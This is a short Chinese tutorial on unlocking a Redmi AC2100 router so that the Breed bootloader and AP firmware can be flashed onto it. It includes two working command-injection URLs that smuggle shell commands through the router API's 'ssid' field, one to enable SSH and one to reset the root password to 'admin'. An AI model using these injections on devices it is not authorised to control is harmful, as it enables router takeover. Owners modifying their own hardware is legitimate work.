redmi AC2100
2、AC2100刷breed及集客AP固件
为电脑手工分配一个192.168.31.X的IP地址,然后通过网线与AC2100(LAN口)连接。AC2100默认管理地址为192.168.31.1。
(AC2100利用漏洞开启telnet)
先在浏览器地址栏输入192.168.31.1,进入管理页面并登录后地址栏链接应为:http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/web/home#router(复制<STOK>那一长串数据,用于填入下一步中的链接中。
AC2100管理页面
(漏洞注入)
在浏览器地址栏中输入以下链接代码,注意替换掉<STOK>部分,否则无效:
http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h; nvram set ssh_en=1; nvram commit; sed -i 's/channel=.*/channel=\"debug\"/g' /etc/init.d/dropbear; /etc/init.d/dropbear start;
回车后返回{"code":0}即代表成功。
(更改管理员root密码)
root账号不想用初始密码的执行下面的代码改密码为admin,在浏览器地址栏中输入以下链接代码,注意替换掉<STOK>部分
http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h; echo -e 'admin\nadmin' | passwd root;
WinSCP
打开WinSCP,选择新建,输入路由IP、用户名root、密码admin,点击登录。登录后在右边选择tmp文件夹,把breed固件拖入(这个固件breed-mt7621-xiaomi-r3g.bin,不要用错了)。
